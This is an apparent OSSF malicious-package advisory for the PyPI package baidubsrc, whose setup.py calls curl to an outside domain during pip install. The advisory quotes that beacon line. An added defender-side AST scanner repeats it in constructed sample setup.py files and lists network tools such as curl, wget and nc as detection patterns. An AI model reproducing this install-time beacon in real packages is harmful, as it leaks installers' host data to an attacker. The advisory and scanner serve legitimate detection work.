mal-2026-4809
Vulnerability from ossf_malicious_packages
Published
2026-05-26 13:07
Modified
2026-05-26 22:57
Summary
Malicious code in baidubsrc (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)

setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.

Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)

During installation, the package calls home, and there is no other functionality.


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.
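
The two findings above (an unconditional shell command with a network tool at module level of setup.py, and the general pattern of overriding a setuptools command to run code at install time) are both things a reviewer can catch statically before the package is ever installed. The following script is an added, defender-side example; it is not part of this record and is not code from Amazon Inspector, kam193 or the package. It parses a setup.py with Python's `ast` module and flags three things: calls to a chosen list of process/network APIs (`SUSPICIOUS_CALLS`, an assumed heuristic list), subclasses of setuptools command classes such as `install`, and string constants containing a domain from this record's indicator list. The three setup.py samples are constructed from the advisory's description and are not the real package contents.

```python
import ast
import re
from typing import List, Tuple

# Constructed sample modeled on the advisory's description of setup.py
# (an unconditional os.system("curl ...") at module level); this is not
# the actual package contents.
SAMPLE_SETUP_PY = '''
import os
from setuptools import setup

os.system("curl xiangyangt.com/pypi")

setup(
    name="baidubsrc",
    version="0.0.1",
    author="demo",
    description="A demo pip package",
    packages=[],
)
'''

# Constructed sample of the second pattern named in the reasons: an
# overridden install command whose run() executes a network tool.
CMDCLASS_SETUP_PY = '''
import subprocess
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        subprocess.run(["curl", "xiangyangt.com/pypi"])
        install.run(self)

setup(name="example", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign control: nothing but a plain setup() call.
BENIGN_SETUP_PY = '''
from setuptools import setup

setup(name="example", version="1.0", packages=[])
'''

# Domain(s) taken from this record's indicator list.
IOC_DOMAINS = {"xiangyangt.com"}

# Assumed heuristic list: APIs that have no business running while pip
# builds or installs a package.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "subprocess.check_call",
    "urllib.request.urlopen", "requests.get", "requests.post", "socket.socket",
}
# setuptools command classes commonly subclassed to hook installation.
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py"}
SHELL_NET_TOOLS = re.compile(r"\b(curl|wget|nc|ncat)\b")


def dotted_name(node: ast.AST):
    """Return 'os.system' for os.system(...), or None for non-name callees."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def string_args(call: ast.Call):
    """Yield the literal string positional arguments of a call."""
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            yield arg.value


def scan_setup_py(source: str) -> List[Tuple[int, str]]:
    """Static triage of a setup.py; returns sorted (line, reason) findings."""
    findings = set()
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [(exc.lineno or 0, "setup.py does not parse; inspect manually")]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.add((node.lineno, f"install-time call to {name}"))
                for s in string_args(node):
                    if SHELL_NET_TOOLS.search(s):
                        findings.add((node.lineno, f"network tool in shell command: {s!r}"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = dotted_name(base) or ""
                if base_name.split(".")[-1] in SETUPTOOLS_COMMANDS:
                    findings.add((node.lineno, f"overrides setuptools command {base_name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for domain in IOC_DOMAINS:
                if domain in node.value:
                    findings.add((node.lineno, f"known IoC domain {domain} in string"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("cmdclass", CMDCLASS_SETUP_PY),
                       ("benign", BENIGN_SETUP_PY)):
        print(label, scan_setup_py(src))
```

The scan is deliberately conservative: it only inspects literal strings handed to the flagged APIs, so obfuscated or dynamically built commands produce at most the "install-time call" finding, which is still the right signal to route a package into manual review. Running it against the sdist's setup.py before installation (or in a pre-install hook of an internal mirror) is where it pays off, since by the time pip has executed setup.py the beacon has already fired.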

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "domains": [
            "xiangyangt.com"
          ],
          "evidence_files": [
            {
              "path": "setup.py",
              "sha256": "72c8d64ee57380a52dbe0f588800c3a93010e96b8ca880e47be5e355def45fa9",
              "tlsh": "e1d02ea14e4222a994c0ac1a2d95380202286d633e20e1c8b3c64b242b491ebab7b679"
            }
          ],
          "package_integrity": [
            {
              "filename": "baidubsrc-0.0.1-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "b960331bddc93619bb76c0e44ac7c37b57845a07de824b1590ceb0758113cbb1",
                "md5": "d87c9c373207730322ddd06b3ab633a1",
                "sha256": "985ada2bb71018594b9b1b944dd6f9f326ef0914c08804d7a39abe8e7bc0a39d"
              }
            },
            {
              "filename": "baidubsrc-0.0.1.tar.gz",
              "hashes": {
                "blake2b_256": "e64910c19329175a3183b844480d2fb212ddd844be8c4940e0667d71ba8baa67",
                "md5": "0075be1d16a6c98c8d67bb089a687286",
                "sha256": "2cdd3074e5efed03318366f2567cd7a4ffc391e8ae01fa4eab4ef153ea5b7280"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "baidubsrc"
      },
      "versions": [
        "0.0.1"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "actran@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "ANALYST"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-004909",
        "import_time": "2026-05-26T13:32:46.899109904Z",
        "modified_time": "2026-05-26T13:08:42Z",
        "sha256": "601a0198fee420c15f127c695a251ac5fb2433357e0a24f146bc8c3cac8a5c77",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-004908",
        "import_time": "2026-05-26T13:32:46.837330409Z",
        "modified_time": "2026-05-26T13:07:47Z",
        "sha256": "e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "pypi/GENERIC-standard-pypi-install-pentest/baidubsrc",
        "import_time": "2026-05-26T22:55:25.019349347Z",
        "modified_time": "2026-05-26T22:06:08.515385Z",
        "sha256": "70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc",
        "source": "kam193",
        "versions": [
          "0.0.1"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)\nsetup.py executes `os.system(\"curl xiangyangt.com/pypi\")` unconditionally during `pip install`. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer\u0027s IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author=\"demo\", description \"A demo pip package\") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.\n\n## Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)\nDuring installation, package calls home, and there is no other functionality.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research \u0026 co, with clearly low-harm possibilities.\n\n\nCampaign: GENERIC-standard-pypi-install-pentest\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n",
  "id": "MAL-2026-4809",
  "modified": "2026-05-26T22:57:06Z",
  "published": "2026-05-26T13:07:47Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/baidubsrc/0.0.1/"
    },
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/baidubsrc"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in baidubsrc (PyPI)"
}